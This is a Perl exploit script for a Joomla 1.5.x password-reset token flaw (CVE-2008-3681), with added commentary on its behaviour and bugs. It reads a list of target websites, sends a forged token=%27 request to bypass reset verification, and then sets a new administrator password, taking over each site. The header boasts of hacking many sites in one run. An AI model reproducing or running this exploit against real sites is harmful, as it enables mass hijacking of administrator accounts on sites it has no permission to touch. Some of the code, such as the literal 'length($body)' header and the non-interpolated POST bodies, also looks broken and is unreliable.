  1. #Exploit Title: Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability (perl)
  2. #Date: 2/05/2014
  3. #Exploit Author: D35m0nd142
  4. #Vendor Homepage: http://www.joomla.org/
  5. #CVE: 2008-3681
  6. # This time you can hack multiple websites by running this script just one time!
  7. # To install File::Slurp --> cpan[1] > force install File::Slurp
  8. # To install Text::Trim --> cpan[1] > install Text::Trim
  9. # To install HTTP::Request --> cpan[1] > force install HTTP::Request
  10. # To install Text::Trim --> cpan[1] > install Text::Trim
  11. # This script picks a list of websites, to hack, from a text file called 'jwebsites.txt'. If this file does not exist or is blank, the script will not work correctly.
  12. # [IMPORTANT] Websites within the file 'jwebsites.txt' MUST be written omitting 'http://'! If this is not respected, the script will not work!
  13.  
  14. #!/usr/bin/perl
  15. use LWP::UserAgent;
  16. use HTTP::Request;
  17. use IO::Socket::INET;
  18. use File::Slurp;
  19. use Text::Trim qw(trim);
  20. use Term::ANSIColor;
  21.  
  22. sub show_header
  23. {
  24. local ($tc,$t) = @_ ;
  25. print color 'white'; print "_____________________________________________________________________________________________________\n\n"; print color 'reset';
  26. print "Host: $tc\n";
  27. print "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0\n";
  28. print "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n";
  29. print "Accept-Language: en-US,en;q=0.5\n";
  30. print "Accept-Encoding: gzip, deflate\n";
  31. print "Referer: $t/index.php?option=com_user&view=reset&layout=confirm\n";
  32. print "Connection: keep-alive \n";
  33. print "Content-Type: application/x-www-form-urlencoded\n";
  34. }
  35.  
  36. sub show_error
  37. {
  38. local ($res) = @_ ;
  39. print "[!] Error during the request: \n";
  40. print colored 'red'; print "HTTP POST error code: "; print color 'reset'; print $res->code,"\n";
  41. print colored 'red'; print "HTTP POST error message: "; print color 'reset'; print $res->message, "\n\n";
  42. }
  43.  
# ---------------------------------------------------------------------------
# Main script (file scope). Reads host names, one per line and without a
# scheme, from jwebsites.txt and probes each one's com_user password-reset
# confirmation page. Every variable not declared with `my` is a package
# global and keeps its value from one loop iteration to the next.
#
# Files written into the current working directory while running (useful
# when looking for traces of this tool on a host): source.txt, source1.txt,
# joutput.html. Outbound requests: one GET and up to two POSTs per target,
# all to /index.php?option=com_user&view=reset&layout=confirm.
# ---------------------------------------------------------------------------
system("clear");
print color 'white'; print "-----------------------------------------------------\n";
print color 'red'; print " Joomla 1.5.x (Token) Remote Admin Change Password \n";
print color 'blue'; print " Created by D35m0nd142 \n";
print color 'white'; print "-----------------------------------------------------\n\n";
print color 'reset';
$file = 'jwebsites.txt';
# Two-argument open on a bareword handle with no error check: a missing or
# unreadable file is not reported and the loop below simply runs zero times.
open(MYFILE, $file);
while(<MYFILE>)
{
chomp;
# $a is one of Perl's sort() globals, reused here as an ordinary scalar.
$a = $_ ;
$target = $a;
$agent = LWP::UserAgent->new();
# The initial GET identifies itself with this BlackBerry User-Agent; the
# POSTs further down use a Firefox string instead, so the two requests in a
# web log will not share a User-Agent.
$agent->agent('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0');

# Lines are expected without a scheme (see the header comments). When one
# already contains http://, $target_cut is not assigned here and keeps the
# value left by the previous iteration (it is a global).
if($target !~ /http:\/\//)
{
$target_cut = $target;
$target = "http://$target";
}

sleep 1;
print color 'yellow';
print "[+] Website loaded => ";
print color 'reset'; print "$target\n";
sleep 1;
print color 'blue'; print "[*] "; print color 'reset'; print "Testing if $target could be vulnerable ...\n";
sleep 1;
$host = $target."/index.php?option=com_user&view=reset&layout=confirm" ;
$req0 = HTTP::Request->new(GET=>$host);
my $req = $agent->request($req0);
# Candidate check: the reset-confirm page is only considered further when it
# does not also ask for a username (the author's trailing comment says why).
if($req->is_success && $req->content !~ /input id=\"username\" name=\"username\" type=\"text\" class=\"required\"/ && $req->content !~ /Username:/ ) # if also username is present, it means that the website is not vulnerable
{
# The fetched page is dumped to source.txt and a fixed grep/cut pipeline is
# run over it; it looks like this extracts the name of a form field whose
# value is 1. $extract contains no interpolated variables, so page content
# is only ever data to grep and never becomes part of the shell command.
# The open() calls here are unchecked and use bareword handles.
open(FILE, "> source.txt");
print FILE $req->content;
close(FILE);
$extract = "grep 'value=\"1\"' source.txt > source1.txt && cut -d \"=\" -f 3 source1.txt > source.txt && cut -d '\"' -f 2 source.txt > source1.txt";
system($extract);
$code = read_file('source1.txt');
chomp $code;
# Return value is discarded; Text::Trim documents in-place trimming when
# called in void context -- TODO confirm for the installed version.
trim($code);
print color 'white'; print "[+] "; print color 'reset'; print "Extracted POST code: "; print color 'white'; print "$code\n"; print color 'reset';
$body = "token=%27&$code=1";
$length = length($body);
$body = "$body\r\n\r\n";
sleep 1;
print "[*] Testing if the website is vulnerable ...\n";
# CORE::sleep takes whole seconds; 0.3 truncates to 0, i.e. no delay.
sleep 0.3;
print color 'red'; print "[*] "; print color 'reset'; print "Creating HTTP POST request ... \n\n";
sleep 1;
# Display only: show_header prints a header mock-up, it does not send.
show_header($target_cut, $target);
print "Content-Length: $length\n";
print "\ttoken=%27&$code=1\n";
print color 'white'; print "_____________________________________________________________________________________________________\n"; print color 'reset';
sleep 1;
print color 'red'; print "\n[*] "; print color 'reset'; print "Sending malicious token to $host ...\n\n";
sleep 0.8;
# A second, separate client is used for the POSTs; its headers are set
# explicitly below rather than inherited from $agent.
my $ua = LWP::UserAgent->new;
my $server = $host;
my $req = HTTP::Request->new(POST => $server);
$req->header('User-Agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0');
$req->header('Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
$req->header('Accept-Language' => 'en-US,en;q=0.5');
$req->header('Accept-Encoding' => 'gzip, deflate');
$req->header('Connection' => 'keep-alive');
$req->header('Content-Type' => 'application/x-www-form-urlencoded');
$req->header('Content-Length' => 'length($body)');
my $post_data = '{"token": "%27", "$code": "1" }';
#print "$post_data\n";
$req->content($post_data);
my $resp = $ua->request($req);

if($resp->is_success)
{
print color 'white'; print "[+] "; print color 'reset'; print "Request sent without errors.\n";
my $message = $resp->decoded_content;
#print "[*] Received reply: $message\n";
# The full response body is saved to joutput.html in the working directory.
open(FILE, "> joutput.html");
print FILE $message;
close(FILE);
# Success heuristic: no "please paste the token" prompt, and a password /
# verify-password pair is present (English, Portuguese or Italian labels).
if ($message !~ /please paste the token in the field/ && (($message =~ /Password:/ && $message =~ /Verify Password/) or ($message =~ /Senha:/ && $message =~ /Verificar Senha/) or ($message =~ /Password:/ && $message =~ /Conferma Password:/)))
{
print color 'red';
print "\n[+] Exploit works! :) \n";
sleep 1;
print color 'reset';
print "[*] Enter the new admin password for the website --> ";
$newpass = <STDIN>;
if($newpass eq '')
{
# CORE::sleep truncates 0.3 to 0 seconds.
sleep 0.3;
print color 'red'; print "[!] "; print color 'reset'; print "You can not insert a blank password little bitch!\n";
exit(1);
}
print color 'red'; print "[*] "; print color 'reset'; print "Creating the second HTTP POST request ... \n";
sleep 1;
# Display only, as above.
show_header($target_cut,$target);
$body = "password1=$newpass&password2=$newpass&$code=1";
$length = length($body);
print "Content-Length: $length\n";
print "$body\n";
print "_____________________________________________________________________________________________________\n";
sleep 1;
# Second POST to the same URL, reusing the $ua client.
my $req1 = HTTP::Request->new(POST => $server);
$req1->header('User-Agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0');
$req1->header('Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
$req1->header('Accept-Language' => 'en-US,en;q=0.5');
$req1->header('Accept-Encoding' => 'gzip, deflate');
$req1->header('Connection' => 'keep-alive');
$req1->header('Content-Type' => 'application/x-www-form-urlencoded');
$req1->header('Content-Length' => '$length');
my $post_data = '{"password1": "$newpass", "password2":"$newpass","$code": "1" }';
#print "$post_data\n";
$req1->content($post_data);
my $resp = $ua->request($req1);
# Only the HTTP status is checked here; the response body below is read into
# $message but never inspected.
if($resp->is_success)
{
print color 'white'; print "[+] Request sent without errors and password changed.\n"; print color 'reset';
my $message = $resp->decoded_content;
print "[*] Try to login to the administrator panel now :) \n";
print "[*] Enjoy it :) Bye... \n\n!";
}
else
{
show_error($resp);
}
}
else
{
print color 'red'; print "\n[!] "; print color 'reset'; print "Token not bypassed. Website is not vulnerable :( \n\n";
}
}
else
{
show_error($resp);
}
}

else
{
print color 'red';
print "[!] "; print color 'reset'; print "The page $host contains also the parameter 'Username', so the website is not vulnerable.\n\n";
}
}